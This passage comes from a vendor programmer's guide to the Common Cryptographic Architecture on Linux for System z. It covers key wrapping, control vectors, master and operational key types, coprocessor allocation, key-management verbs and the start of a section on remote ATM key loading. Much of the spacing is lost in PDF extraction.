byte - X'00' following the label value. +| v Context -Anull string. No context is used. +| v L- The length of the derived key to be produced, rounded up to the next multiple of 256. +| v PRF - HMAC-SHA256. +| Variable length token (AESKW method) +| The wrapping method for the variable-length key tokens withAESKW is defined in standardANSI X9.102. +| The wrapping of the payload of a variable length key (*K) using anAES *MK is defined as: +| e*MK(*K) = eAESKW*MK(P) +| P = ICV || Pad length || Hash length || Hash options || Data hash || *K || Padding +| Where: +|| ICV Is the 6 byte constant X'A6A6A6A6A6A6'. +|| Pad length Is the length of the padding in bits. +|| Hash length Is the length of the Data Hash in bytes. +|| Hash options Is a 4-byte field. +|| Data hash Is the hash of the associated data block. +|| Padding Is the number of bytes of X'00' used to make the overall length of P a multiple of 16. +|| eAESKW Means encryption using theAESKW method. +24 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Control vector +Aunique control vector exists for each type of CCAkey. For an internal key token, the coprocessor XORs +the master key with the control vector associated with the type of key the master key will encipher. The +control vector ensures that an operational key is used only in cryptographic functions for which it is +intended. For example, the control vector for an input PIN-encrypting key ensures that such a key can be +used only in the Encrypted PIN Translate and Encrypted PIN Verify functions. +Types of keys +The cryptographic keys are grouped into the following categories based on the functions that they perform: +Symmetric keys master key (SYM-MK) +The SYM-MK master key is a triple-length (192-bit) key that is used only to encrypt other DES keys on +the coprocessor. The administrator installs and changes the SYM-MK master key using the panel.exe +utility, the clear key entry panels, the z/OS® clear key entry panels, or the optional Trusted Key Entry +(TKE) workstation. The master key always remains within the secure boundary of the coprocessor. It is +used only to encipher and decipher keys that are in operational form. +For details about panel.exe, see “The panel.exe utility” on page 553. +Note: If the coprocessor is shared with z/OS, the SYM-MK key must be a double-length (128-bit) key. +This means that the first 64 bits and the last 64 bits of the key must be identical. If the master +key is loaded by z/OS CCAor from a TKE workstation, it will automatically be a double-length +key. +AES keys master key (AES-MK) +| TheAES-MK master key is a 256-bit key that is used to encrypt otherAES keys and HMAC keys on +| the coprocessor. The administrator installs and changes theAES-MK master key using the panel.exe +| utility, the clear key entry panels, the z/OS clear key entry panels, or the optional Trusted Key Entry +| (TKE) workstation. The master key always remains within the secure boundary of the coprocessor. It is +| used only to encipher and decipher keys that are in operational form. +| For details about panel.exe, see “The panel.exe utility” on page 553. +Asymmetric keys master key (ASYM-MK) +TheASYM-MK is a triple-length (192-bit) key that is used to protect RSAprivate keys on the +coprocessor. The administrator installs and changes theASYM-MK master key using the panel.exe +utility, the clear key entry panels, the z/OS clear key entry panels, or the optional Trusted Key Entry +(TKE) workstation. The master key always remains within the secure boundary of the coprocessor. It is +used only to encipher and decipher keys that are in operational form. +For details about panel.exe, see “The panel.exe utility” on page 553. +| AES PKAmaster key (APKA-MK) +| TheAPKA-MK key, introduced to CCAbeginning with Release 4.1.0, is used to encrypt and decrypt the +| Object Protection Key (OPK) that is itself used to wrap the key material of an Elliptic Curve +| Cryptography (ECC) key. ECC keys are asymmetric. TheAPKA-MK is a 256-bit (32-byte) value. The +| administrator installs and changes theAPKA-MK master key using the panel.exe utility, the clear key +| entry panels, the z/OS clear key entry panels, or the optional Trusted Key Entry (TKE) workstation. +Data-encrypting keys +The data-encrypting keys are single-length DES (64-bit), double-length DES (128-bit), or triple-length +DES (192-bit) keys, or 128-bit, 192-bit or 256-bitAES keys that protect data privacy. Single-length DES +data-encrypting keys can also be used to encode and decode data and authenticate data sent in +messages. If you intend to use a data-encrypting key for an extended period of time, you can store it in +the CCAkey storage file so that it will be re-enciphered if the master key is changed. +You can use single-length DES data-encrypting keys in the Encipher and Decipher verbs to manage +data, and also in the MAC Generate and MAC Verify verbs. Double-length DES and triple-length DES +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 25 + +data-encrypting keys can be used in the Encipher and Decipher verbs for more secure data privacy. +DATAC is also a double-length DES data encrypting key. +AES data-encrypting keys can be used in services similar to DES data-encrypting key services. +CIPHER keys +These consist of CIPHER, ENCIPHER, and DECIPHER keys. They are single and double length DES +keys for enciphering and deciphering data. +| HMAC keys +| HMAC keys are variable-length symmetric keys. The length is in the range of 80 - 2024. HMAC keys +| are used to generate and verify HMACs using the FIPS-198 algorithm, with the HMAC Generate and +| HMAC Verify verbs. +| v Operational keys will be encrypted under theAES master key +| v HMAC keys can be imported and exported under an RSAkey. +| v HMAC keys will be stored in theAES key storage file. TheAES master key must be active. +| For more information about HMAC keys and verb processing, see Chapter7, “Verifying data integrity +| and authenticating messages,” on page 233. +MAC keys +The MAC keys are single-length DES (64-bits - DATAM, DATAMV, MAC, and MACVER, ) and +double-length DES (128-bits - DATAM, DATAMV, MAC, and MACVER) keys used for the verbs that +generate and verify MACs. +PIN keys +The personal identification number (PIN) is a basis for verifying the identity of a customer across +financial industry networks. PIN keys are used in cryptographic functions to generate, translate, and +verify PINs, and protect PIN blocks. They are all double-length DES (128 bits) keys. PIN keys are used +in the Clear PIN Generate, Encrypted PIN Verify, and Encrypted PIN Translate verbs. +For installations that do not support double-length DES 128-bit keys, effective single-length DES keys +are provided. For a single-length DES key, the left key half of the key equals the right key half. +“Processing personal identification numbers” on page 37 gives an overview of the PIN algorithms you +need to know to write your own application programs. +Transport keys (or key-encrypting keys) +Transport keys are also known as key-encrypting keys, or KEKs. They are double-length DES (128 +bits) keys used to protect other keys when you distribute them from one system to another. +There are several types of transport keys: +Exporter or OKEYXLAT key-encrypting key +This type of key protects keys of any type that are sent from your system to another system. The +exporter key at the originator is the same key as the importer key of the receiver. +Importer or IKEYXLAT key-encrypting key +This type of key protects keys of any type that are sent from another system to your system. It also +protects keys that you store externally in a file that you can import to your system later. The importer +key at the receiver is the same key as the exporter key at the originator. +NOCV Importers and Exporters +These keys are key-encrypting keys used to exchange keys with systems that do not recognize +key-encrypting key variants. There are some requirements and restrictions for the use of NOCV +key-encrypting keys: +v The use of NOCV IMPORTERs and EXPORTERs is controlled by access control points in the +coprocessor's role-based access control system. +v Only programs in system or supervisor state can use the NOCV key-encrypting key in the form of +tokens in verbs.Any program can use NOCV key-encrypting keys with label names from the key +storage. +26 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +v Access to NOCV key-encrypting keys should be carefully controlled, because use of these keys +can reduce security in your key management process. +v NOCV key-encrypting key can be used to encrypt single or double length DES keys with standard +CVs for key types DATA, DATAC, DATAM, DATAMV, DATAXLAT, EXPORTER, IKEYXLAT, +IMPORTER, IPINENC, single-length MAC, single-length MACVER, OKEYXLAT, OPINENC, +PINGEN and PINVER. +v NOCV key-encrypting keys can be used with triple length DATAkeys. Because DATAkeys have 0 +CVs, processing will be the same as if the key-encrypting keys are standard key-encrypting keys +(not the NOCV key-encrypting key). +| You use key-encrypting keys to protect keys that are transported using any of the following verbs: Data +| Key Export, Key Export, Key Import, Clear Key Import, Multiple Clear Key Import, Key Generate, Key +| Generate2, Key Translate and Key Translate2. +For installations that do not support double-length key-encrypting keys, effective single-length keys are +provided. For an effective single-length key, the clear key value of the left key half equals the clear key +value of the right key half. +Key-generating keys +Key-generating keys are double-length keys used to derive other keys. This is often used in smart card +applications. +Table1 describes the key types. +Table1.Keytypes +KeyType Description +|| AESDATA Dataencryptingkey.UsetheAES128-bit,192-bit,or256-bitkeytoencipheranddecipherdata. +|| AESTOKEN CancontainanAESkey. +|| CIPHER Usedonlytoencryptordecryptdata.Thisisasingleordoublelengthkeyandcanbeusedin +| theEncipherorDecipherverbs. +|| CLRAES Dataencryptingkey.Thekeyvalueisnotencrypted.UsethisAES128-bit,192-bit,or256-bit +| keytoencipheranddecipherdata. +|| CLRDES Dataencryptingkey.Thekeyvalueisnotencrypted.UsethisDESsingle-length,double-length, +| ortriple-lengthkeytoencipheranddecipherdata. +CVARDEC Thecryptographicvariabledecipherservice,whichisavailableinsomeCCAimplementations, +usesaCVARDECkeytodecryptplaintextbyusingtheCipherBlockChaining(CBC)method. +Thisisasingle-lengthkey. +CVARENC Thecryptographicvariableencipherservice,whichisavailableinsomeCCAimplementations, +usesaCVARENCkeytoencryptplaintextbyusingtheCipherBlockChaining(CBC)method. +Thisisasingle-lengthkey. +CVARPINE UsedtoencryptaPINvaluefordecryptioninaPIN-printingapplication.Thisisasingle-length +key. +CVARXCVL UsedtoencryptspecialcontrolvaluesinDESkeymanagement.Thisisasingle-lengthkey. +CVARXCVR UsedtoencryptspecialcontrolvaluesinDESkeymanagement.Thisisasingle-lengthkey. +|| DATA Dataencryptingkey.UsethisDESsingle-length,double-length,ortriple-lengthkeytoencipher +| anddecipherdata.UsetheAES128-bit,192-bit,or256-bitkeytoencipheranddecipherdata. +DATAC UsedtospecifyaDATA-classkeythatwillperformintheEncipherandDecipherverbs,butnot +intheMACGenerateorMACVerifyverbs.Thisisadouble-lengthkey.Onlyavailablewitha +CEX3C. +DATAM Key-encryptingkeysthathaveacontrolvectorwiththisattributeformerlycouldonlybeusedto +transportkeyswithakeytypeofDATA,CIPHER,ENCIPHER,DECIPHER,MAC,andMACVER. +Themeaningofthiskeywordhasbeendiscontinuedanditsusageisallowedforbackward +compatibilityreasonsonly. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 27 + +Table1.Keytypes (continued) +KeyType Description +DATAMV UsedtospecifyaDATA-classkeythatperformsintheMACVerifyverb,butnotintheMAC +Generate,Encipher,orDecipherverbs. +|| DATAXLAT Datatranslationkey.Usethissingle-lengthkeytoreenciphertextfromoneDATAkeytoanother. +DECIPHER Usedonlytodecryptdata.DECIPHERkeyscannotbeusedintheEncipher(CSNBENC)verb. +Thisisasingle-lengthkey. +ThisisasingleordoublelengthkeyandcanbeusedintheDecipherverb. +DKYGENKY Usedtogenerateadiversifiedkeybasedonthekey-generatingkey.Thisisadouble-lengthkey. +ENCIPHER Usedonlytoencryptdata.ENCIPHERkeyscannotbeusedintheDecipher(CSNBDEC)verb. +Thisisasingle-lengthkey. +ThisisasingleordoublelengthkeyandcanbeusedintheEncipherverb. +EXPORTER Exporterkey-encryptingkey.Usethisdouble-lengthkeytoconvertakeyfromtheoperational +formintoexportableform. +|| HMAC Variable-lengthHMACgenerationkey.UsethiskeytogenerateorverifyaMessage +| AuthenticationCodeusingthekeyed-hashMACalgorithm. +|| HMACVER Variable-lengthHMACverificationkey.UsethiskeytoverifyaMessageAuthenticationCode +| usingthekeyed-hashMACalgorithm. +| IKEYXLAT UsedtodecryptaninputkeyintheKeyTranslateandKeyTranslate2verbs.Thisisa +| double-lengthkey. +IMPORTER Importerkey-encryptingkey.Usethisdouble-lengthkeytoconvertakeyfromimportableform +intooperationalform. +|| IMP-PKA Double-lengthlimited-authorityimporterkeyusedtoencryptPKAprivatekeyvaluesinPKA +| externaltokens. +IPINENC Double-lengthinputPIN-encryptingkey.PINblocksreceivedfromothernodesorautomaticteller +machine(ATM)terminalsareencryptedunderthistypeofkey.TheseencryptedPINblocksare +theinputtotheEncryptedPINTranslate,EncryptedPINVerify,andClearPINGenerate +Alternateverbs. +KEYGENKY Usedtogenerateakeybasedonthekey-generatingkey.Thisisadouble-lengthkey. +MAC MACgenerationkey.Usethissingle-lengthkeytogenerateaMessageAuthenticationCode. +ThisisasingleordoublelengthkeyonaCEX3C. +MACVER MACverificationkey.Usethissingle-lengthkeytoverifyaMessageAuthenticationCode. +ThisisasingleordoublelengthkeyonCEX3C. +| OKEYXLAT UsedtoencryptanoutputkeyintheKeyTranslateandKeyTranslate2verbs.Thisisa +| double-lengthkey. +OPINENC OutputPIN-encryptingkey.Usethisdouble-lengthoutputkeytotranslatePINs.TheoutputPIN +blocksfromtheEncryptedPINTranslate,EncryptedPINGenerate,andClearPINGenerate +Alternateverbsareencryptedunderthistypeofkey. +PINGEN PINgenerationkey.Usethisdouble-lengthkeytogeneratePINs. +PINVER PINverificationkey.Usethisdouble-lengthkeytoverifyPINs. +SECMSG UsedtoencryptPINsorkeysinasecuremessage.Thisisadouble-lengthkey. +|| TOKEN Akeytokenthatmightcontainakey. +Table2 on page 29 lists key subtypes passed in the rule_array keyword. +28 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table2.Keysubtypesspecifiedbytherule_arraykeyword +rule_array +keyword Description +AMEX-CSC AMACkeythatcanbeusedfortheAMEXCSCtransactionvalidationprocessMACcalculation +method,usedwiththeTransactionValidation(CSNBTRV)verb. +ANSIX9.9 AMACkeythatcanbeusedfortheANSIX9.9MACcalculationmethod,eitherforMAC +Generate(CSNBMGN),MACVerify(CSNBMVR),orTransactionValidation(CSNBTRV).Other +ControlVectorbitscouldlimittheseusages. +ANY Key-encryptingkeysthathaveacontrolvectorwiththisattributecanbeusedtotransportany +typeofkey.Themeaningofthiskeywordhasbeendiscontinued,anditsusageisallowedfor +backwardcompatibilityreasonsonly. +ANY-MAC CanbeusedwithanyfunctionorMACcalculationmethodthatusesaMACkey,suchasMAC +Generate(CSNBMGN),MACVerify(CSNBMVR),orTransactionValidation(CSNBTRV).Thisis +thedefaultconfigurationforaMACkeycontrolvector. +CVVKEY-A Canbeusedas'KeyA'ineithertheCVVGenerate(CSNBCSG)orCVVVerify(CSNBCSV) +verbs,ascontrolledbytheCVVgenerationandverificationControlVectorbits(bits20and21 +respectively). +CVVKEY-B Canbeusedas'KeyB'ineithertheCVVGenerate(CSNBCSG)orCVVVerify(CSNBCSV) +verbs,ascontrolledbytheCVVgenerationandverificationControlVectorbits(bits20and21 +respectively). +DATA Dataencryptingkey.Usethis8-byte,16-byteor24-byteDESkeyor16-byte,24-byteor32-byte +AESkeytoencipheranddecipherdata. +EPINGENA Legacykeysubtype,usedtoturnonbit19ofaPINGeneratingKeyControlVector.Thedefault +PINGeneratingKeytypewillhavethisbiton.NoPINgeneratingorprocessingbehavioris +currentlyinfluencedbythiskeysubtypeparameter.EPINGENAisnolongersupported,although +thebitretainsthisdefinitionforcompatibilityThereisnoEncryptedPinGenerateAlternateverb +LMTD-KEK Key-encryptingkeysthathaveacontrolvectorwiththisattributeformerlycouldonlybeusedto +exchangekeyswithkey-encryptingkeysthatcarryNOT-KEK,PIN,orDATAkey-typeciphering +restrictions.Theusageofthiskeywordhasbeendiscontinuedanditsusageisallowedfor +backwardcompatibilityreasonsonly. +NOT-KEK Key-encryptingkeysthathaveacontrolvectorwiththisattributeformerlycouldnotbeusedto +transportkey-encryptingkeys.Themeaningofthiskeywordhasbeendiscontinuedandits +usageisallowedforbackwardcompatibilityreasonsonly. +PIN Key-encryptingkeysthathaveacontrolvectorwiththisattributeformerlycouldonlybeusedto +transportkeyswithakeytypeofPINVER,IPINENC,andOPINENC.Theusageofthiskeyword +hasbeendiscontinuedanditsusageisallowedforbackwardcompatibilityreasonsonly. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 29 + +├─Key Type─┤├─Key Subtype─┤├─Key Usage──────────────────────────────────────────────────────────────────────┤ +(cid:6)(cid:6)┬─MAC ─────┐ Note: ANY is default +├─MACVER───┴────────────────┬─────────┐ +├─DATA─────┐ ├─ANY─────┤ +├─CIPHER───┤ ├─ANSIX9.9┤ +├─ENCIPHER─┤ ├─CVVKEY─A┤ +├─DECIPHER─┤ ├─CVVKEY─B┤ +├─CVARENC──┤ └─AMEX─CSC┴────────────┐ Note: SINGLE +├─CVARXCVL─┤ │ is default +├─CVARXCVR─┴───────────────────────────────────────┴─────────────────────┬──────────┐ +│ Note: DKYL0 Note: DMAC ├─SINGLE───┤ +│ is default is default ├─KEYLN8───┤ +├─DKYGENKY──┬─────────┐ ┌──┬─────────┐ ├─DOUBLE───┤ +│ ├─DKYL0───┤ │ ├─DMAC────┤ ├─KEYLN16──┤ +│ ├─DKYL1───┤ │ ├─DDATA───┤ └─MIXED────┴─┐ +│ ├─DKYL2───┤ │ ├─DMV─────┤ │ +│ ├─DKYL3───┤ │ ├─DIMP────┤ │ +│ ├─DKYL4───┤ │ ├─DEXP────┤ │ +│ ├─DKYL5───┤ │ ├─DPVR────┤ │ +│ ├─DKYL6───┤ │ ├─DMKEY───┤ │ +│ └─DKYL7───┴──┘ ├─DMPIN───┤ │ +│ └─DALL────┴───────────────────────────────────┐ │ +├─SECMSG────────────────────┬─SMKEY───┐ │ │ +├─DATAC────┐ └─SMPIN───┴───────────────────────────────────┤ │ +├─DATAM────┤ │ │ +├─DATAMV───┴──────────────────────────────────────────────────────────────┤ │ +├─KEYGENKY──────────────────┬─CLR8─ENC────────────────────────────────────┤ │ +├─IKEYXLAT─┐ └─UKPT────────────────────────────────────────┤ │ +├─OKEYXLAT─┴─────────────────────────────────────────────────┐ │ │ +├─IMPORTER───────────────┬────Note 1────┐ │ │ │ +│ │ ┌──────────┐ │ │ │ │ +│ │ (cid:14) │ │ │ │ │ +│ └──┬─OPIM────┤ │ │ │ │ +│ ├─IMEX────┤ │ │ │ │ +│ ├─IMIM────┤ │ │ │ │ +│ └─IMPORT──┴─┤ │ │ │ +├─EXPORTER───────────────┬────Note 1────┤ │ │ │ +│ │ ┌──────────┐ │ │ │ │ +│ │ (cid:14) │ │ │ │ │ +│ └──┬─OPEX────┤ │ │ │ │ +│ ├─IMEX────┤ │ │ │ │ +│ ├─EXEX────┤ │ │ │ │ +│ └─EXPORT──┴─┴─────────┬────────┐ │ Note: ANY │ │ +│ └─XLATE──┴─┤ is default │ │ +├─PINVER─────────────────────────────────────────┐ ├──────────┐ │ │ +├─PINGEN─────────────────┬────Note 1────┐ │ ├─ANY──────┤ │ │ +│ │ ┌──────────┐ │ │ ├─NOT─KEK──┤ │ │ +│ │ (cid:14) │ │ │ ├─DATA─────┤ │ │ +│ └──┬─CPINGEN─┤ │ │ ├─PIN──────┤ │ │ +│ ├─CPINGENA┤ │ │ └─LMTD─KEK─┴─┤ │ +│ ├─EPINGEN─┤ │ │ │ │ +│ └─EPINVER─┴─┴────────┤ │ │ +├─IPINENC────────────────┬────Note 1─────┐ │ Note: NO─SPEC │ │ +│ │ ┌───────────┐ │ │ is default │ │ +│ │ (cid:14) │ │ ├──────────┐ │ │ +│ └──┬─CPINGENA─┤ │ ├─NO─SPEC──┤ │ │ +│ ├─EPINVER──┤ │ ├─IBM─PIN──┤ │ │ +│ ├─REFORMAT─┤ │ ├─GBP─PIN──┴──┬──────────┤ │ +│ └─TRANSLAT─┴─┴───┐ ├─IBM─PINO─┐ └─NOOFFSET─┤ │ +└─OPINENC────────────────┬────Note 1─────┐ │ ├─GBP─PINO─┤ │ │ +│ ┌───────────┐ │ │ ├─VISA─PVV─┤ │ │ +│ (cid:14) │ │ │ └─INBK─PIN─┴─────────────┤ │ +└──┬─CPINENC──┤ │ │ │ Note: │ +├─EPINGEN──┤ │ │ │ DOUBLE │ +├─REFORMAT─┤ │ │ │ is default│ +└─TRANSLAT─┴─┴───┴────────────────────────────┼──────────┐│ +├─DOUBLE───┤│ +Note 1: All keywords in the list below are ├─KEYLN16──┤│ Note: XPORT─OK +defaults unless one or more keywords └─MIXED────┴┤ is default +in the list are specified. ├──────────┐ +├─XPORT─OK─┤ +└─NO─XPORT─┴┬──────────┐ +└─KEY─PART─┴─(cid:6)(cid:6) +Figure3.ControlVectorGenerateandKeyTokenBuildCVkeywordcombinations +Clear keys +Aclear key is the base value of a key, and is not encrypted under another key. Encrypted keys are keys +whose base value has been encrypted under another key. +30 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +To convert a clear key to an encrypted data key in operational form, use either the Clear Key Import verb +or the Multiple Clear Key Import verb. +Multi-coprocessor capabilities +Multi-coprocessor capabilities allow you to employ more than one coprocessor. When more than one +coprocessor with CCAis installed, an application program can explicitly select which cryptographic +resource (coprocessor) to use, or it can optionally employ the default coprocessor. To explicitly select a +coprocessor, use the Cryptographic ResourceAllocate verb. This verb allocates a coprocessor loaded with +the CCAsoftware. When a coprocessor is allocated, CCArequests are routed to it until it is deallocated. +To deallocate an allocated coprocessor, use the Cryptographic Resource Deallocate verb. When a +coprocessor is not allocated (either before an allocation occurs or after the cryptographic resource is +deallocated), requests are routed to the default coprocessor. To determine the number of CCA +coprocessors installed, use the Cryptographic Facility Query verb with the STATCARD rule_array keyword. +The verb returns the number of coprocessors running CCAsoftware, which includes any coprocessors +loaded with CCAuser defined function (UDX) code. +To determine if a card is a CEX2C or CEX3C, use one of these methods: +v Invoke the Cryptographic Facility Query verb (see “Determining if a card is a CEX2C or CEX3C” on +page 58). +v Use the sysfs interface, the hwtype attribute (see “The sysfs interface” on page 538). +| v Run panel.exe -x using the panel.exe utility installed with the RPM, to get a quick summary of cards +| available and their status. See “The panel.exe utility” on page 553. +| v Run ivp.e, another utility installed with the RPM, which gives more detailed information about each card +| available. SeeAppendixL, “Utilities,” on page 553. +With the first call to CCAfrom a process, CCAassociates coprocessor designators CRP01, CRP02, and +so on with specific coprocessors. The host determines the total number of coprocessors installed through +a call to the coprocessor device driver.Adding, removing, or relocating coprocessors can alter the number +associated with a specific coprocessor. The host then polls each coprocessor in turn to determine which +ones contain the CCAapplication.As each coprocessor is evaluated, the CCAhost associates the +identifiers CRP01, CRP02, and so forth to the coprocessors with CCA. Coprocessors loaded with a UDX +extension to CCAare also assigned a CRPnn identifier. +| For a specific device driver, names such as these are used: CRPnn, cardnn,APnn, and so forth, where +| the nn values normally do not match (some start with 0, others 1, for example). +You can alter the default designation by explicitly setting the CSU_DEFAULT_ADAPTER environment +variable. This is accomplished by issuing following command: +export CSU_DEFAULT_ADAPTER=CRPxx +Replace CRPxx with the identifier for the resource you wish to use, such as CRP02. +The selection of a default device occurs with the first CCAcall to a coprocessor. When the default device +is selected, it remains constant throughout the life of the thread. Changing the value of the environment +variable after a thread uses a coprocessor does not affect the assignment of the default coprocessor. If a +thread with an allocated coprocessor ends without first de-allocating the coprocessor, excess memory +consumption results. It is not necessary to deallocate a cryptographic resource if the process itself ends; it +is suggested only if individual threads end while the process continues to run. +When CEX2C and CEX3C cards are active in the same system, take note of these points: +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 31 + +v The CCAlibrary will detect CEX2C and CEX3C adapters and intermingle them in the CRPnn adapter +instance list. This is a list of all available adapters, in the order that they were discovered by the device +driver. +v The default adapter will be the lowest numbered CEX3C instance found by the device driver. +v Auser can specify the proper 'CRPnn' number to allocate and work with any card however, CEX2C or +CEX3C. +| v For a specific device driver, names such as these are used: CRPnn, cardnn,APnn, and so forth, where +| the nn values normally do not match (some start with 0, others 1, for example). +Note: The scope of the Cryptographic ResourceAllocate and the Cryptographic Resource Deallocate +verbs is to a thread.Amultithreaded application program can use all of the installed CCA +coprocessors simultaneously.Aprogram thread can use only one of the installed coprocessors at +any given time, but it can switch to a different installed coprocessor as needed. To perform the +switch, a program thread must deallocate an allocated cryptographic resource, if any, and then it +must allocate the desired cryptographic resource. The Cryptographic ResourceAllocate verb fails if +a cryptographic resource is already allocated. +Note that the mapping of logical card identifiers such as CRP01 and CRP02 to physical cards in your +machine is not defined. This is because the mapping can change depending on the machine and its +configuration. If your application needs to identify specific coprocessor cards, you can do one of the +following: +v Use the Cryptographic Facility Query verb (see “Cryptographic Facility Query (CSUACFQ)” on page 58) +with the STATCARD rule_array keyword +v Use the panel.exe utility program with option -x, in order to read a card's serial number (see “The +panel.exe utility” on page 553). +To determine if a card is a CEX2C or CEX3C, use one of these methods: +v Invoke the Cryptographic Facility Query verb (see “Determining if a card is a CEX2C or CEX3C” on +page 58). +v Use the sysfs interface, the hwtype attribute (see “The sysfs interface” on page 538). +| v Run panel.exe -x using the panel.exe utility installed with the RPM, to get a quick summary of cards +| available and their status. See “The panel.exe utility” on page 553. +| v Run ivp.e, another utility installed with the RPM, which gives more detailed information about each card +| available. SeeAppendixL, “Utilities,” on page 553. +Using the CCA node and master key management verbs +The following verbs are used for the CCAnode and master key management functions: +v Cryptographic Facility Query (CSUACFQ) +v Cryptographic Facility Version (CSUACFV) +v Cryptographic ResourceAllocate (CSUACRA) +v Cryptographic Resource Deallocate (CSUACRD) +v Cryptographic Variable Encipher (CSNBCVE) +v Data Key Export (CSNBDKX) +v Data Key Import (CSNBDKM) +v Diversified Key Generate (CSNBDKG) +v Key Export (CSNBKEX) +v Key Generate (CSNBKGN) +v Key Import (CSNBKIM) +v Key Part Import (CSNBKPI) +32 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +v Key Storage Initialization (CSNBKSI) +v Key Test (CSNBKYT) +v Key Test Extended (CSNBKYTX) +v Key Token Build (CSNBKTB) +v Key Token Change (CSNBKTC) +v Key Token Parse (CSNBKTP) +v Key Translate (CSNBKTR) +v Master Key Process (CSNBMKP) +v Multiple Clear Key Import (CSNBCKM) +v Prohibit Export (CSNBPEX) +v Prohibit Export Extended (CSNBPEXX) +v Random Number Generate (CSNBRNG) +v Random Number Generate Long (CSNBRNGL) +v Random Number Tests (CSUARNT) +v Symmetric Key Export (CSNDSYX) +v Symmetric Key Generate (CSNDSYG) +v Symmetric Key Import (CSNDSYI) +v Symmetric Key Import2 (CSNDSYI2) +Verbs for managing AES and DES key storage files +| CCAprovidesAPI functions to allow application programs to manage theAES and DES key storage file, +| where key tokens are stored when the program references them by key label name. The following verbs +| are used to manage theAES and DES key storage files: +| v AES Key Record Create (CSNBAKRC) +| v AES Key Record Delete (CSNBAKRD) +| v AES Key Record List (CSNBAKRL) +| v AES Key Record Read (CSNBAKRR) +| v AES Key Record Write (CSNBAKRW) +| v DES Key Record Create (CSNBKRC) +| v DES Key Record Delete (CSNBKRD) +| v DES Key Record List (CSNBKRL) +| v DES Key Record Read (CSNBKRR) +| v DES Key Record Write (CSNBKRW) +Verbs for managing the PKA key storage file and PKA keys in the +cryptographic engine +The PKAkey storage file is a repository for RSAkeys, similar to theAES and DES key storage files.An +application can store keys in the key storage file and refer to them by label when using any of the verbs +which accept RSAkey tokens as input. The following verbs are used to manage the PKAkey storage file, +or PKAkeys stored in the cryptographic engine: +v PKAKey Record Create (CSNDKRC) +v PKAKey Record Delete (CSNDKRD) +v PKAKey Record List (CSNDKRL) +v PKAKey Record Read (CSNDKRR) +v PKAKey Record Write (CSNDKRW) +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 33 + +v Retained Key Delete (CSNDRKD) +v Retained Key List (CSNDRKL) +Improved remote key distribution +| +| Note: This improved remote key distribute support is only available on the IBM z9® EC, z9 BC, z10™ EC +| and z10 BC servers. +| New methods have been added for securely transferring symmetric encryption keys to remote devices, +| such asAutomated Teller Machines (ATMs), PIN-entry devices, and point of sale terminals. These +| methods can also be used to transfer symmetric keys to another cryptographic system of any type, such +| as a different kind of Hardware Security Module (HSM) in an IBM or non-IBM computer server. This +| change replaces expensive human operations with network transactions that can be processed quickly and +| inexpensively. This method makes significant interoperability improvements to related cryptographic +| key-management functions. +| For the purposes of this description, theATM scenario will be used to illustrate operation of the new +| methods. Other uses of this method are also possible. +Remote key loading +| +| Remote key loading is the process of installing symmetric encryption keys into a remotely located device +| from a central administrative site. This encompasses two phases of key distributions: +| v Distribution of initial key encrypting keys (KEKs) to a newly installed device.AKEK is a type of +| symmetric encryption key that is used to encrypt other keys so that they can be securely transmitted +| over unprotected paths. +| v Distribution of operational keys or replacement KEKs, enciphered under a KEK currently installed in the +| device. +| Access control points are assigned to roles to control keyword usage in the services provided forATM +| remote key loading. Table3 lists the access control points used by theATM remote key loading function. +|| Table3.AccessControlPointsUsedbyATMremotekeyloading +|||| Verbname Entrypoint Offset AccessControlPointnameandcomments +|||| TrustedBlockCreate CSNDTBC X'030F' TrustedBlockCreate-CreateaTrustedKeyBlockinInactive +| form +|||| TrustedBlockCreate CSNDTBC X'0310' TrustedBlockCreate-ActivateanInactiveTrustedKeyBlock +|||| PKAKeyImport CSNDPKI X'0311' PKAKeyImport-ImportanExternalTrustedKeyBlockto +| internalform +| ConvertTrustedBlockfromexternaltointernalformat +|||| PKAKeyImport CSNDPKI X'0104' PKAKeyImport +|||| RemoteKeyExport CSNDRKX X'0312' RemoteKeyExport-Generateorexportakeyforusebya +| non-CCAnode +|||| Key Generate CSNBKGN X''00DB' KeyGenerate-SINGLE-R +|| Remote Key Export CSNDRKX +| Replicationofasingle-lengthsourcekey(whichiseitheran +| RKXtokenoraCCAtoken)iftheoutputsymmetricencryption +| resultistobeaCCAtoken,andtheCVinthetrustedblock's +| CommonExportKeyParametersTLVObjectis16byteswith +| keyformbits'fff'settoX''010'forthelefthalfandX'001'for +| therighthalf. +34 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| Table3.AccessControlPointsUsedbyATMremotekeyloading (continued) +|||| Verbname Entrypoint Offset AccessControlPointnameandcomments +|||| KeyImport CSNBKIM X'027B' KeyImport-Unrestricted +| Theimporterkeyidentifierintheinitialcodereleasemust +| haveuniquehalves. +|||| KeyExport CSNBKEX X''0276' KeyExport-Unrestricted +| Thetransportkeyidentifierintheinitialcodereleasemust +| haveuniquehalves. +| +| Old remote key loading example +| Use anATM as an example of the remote key loading process.AnewATM has none of the purchaser's +| keys installed when it is delivered from the manufacturer. The process of getting the first key securely +| loaded is difficult. +| The installation of the first key on theATM has typically been done by loading the first KEK into eachATM +| manually, in multiple cleartext key parts. Using dual control for key parts, two separate people must carry +| key part values to theATM, then load each key part manually.After they are inside theATM, the key parts +| are combined to form the actual KEK. In this manner, neither of the two people has the entire key, +| protecting the key value from disclosure or misuse. This method is labor-intensive and error-prone, making +| it expensive. +| New remote key loading methods +| New remote key loading methods have been developed to overcome some of the shortcomings of the old +| manual key loading methods. These new methods define acceptable techniques using public key +| cryptography to load keys remotely. Using these new methods, initial KEKs can be loaded without sending +| people to the remote device. This will reduce labor costs, be more reliable, and be much less expensive to +| install and change keys. +| The new cryptographic features provide new methods for the creation and use of the special key forms +| needed for remote key distribution of this type. In addition, the new 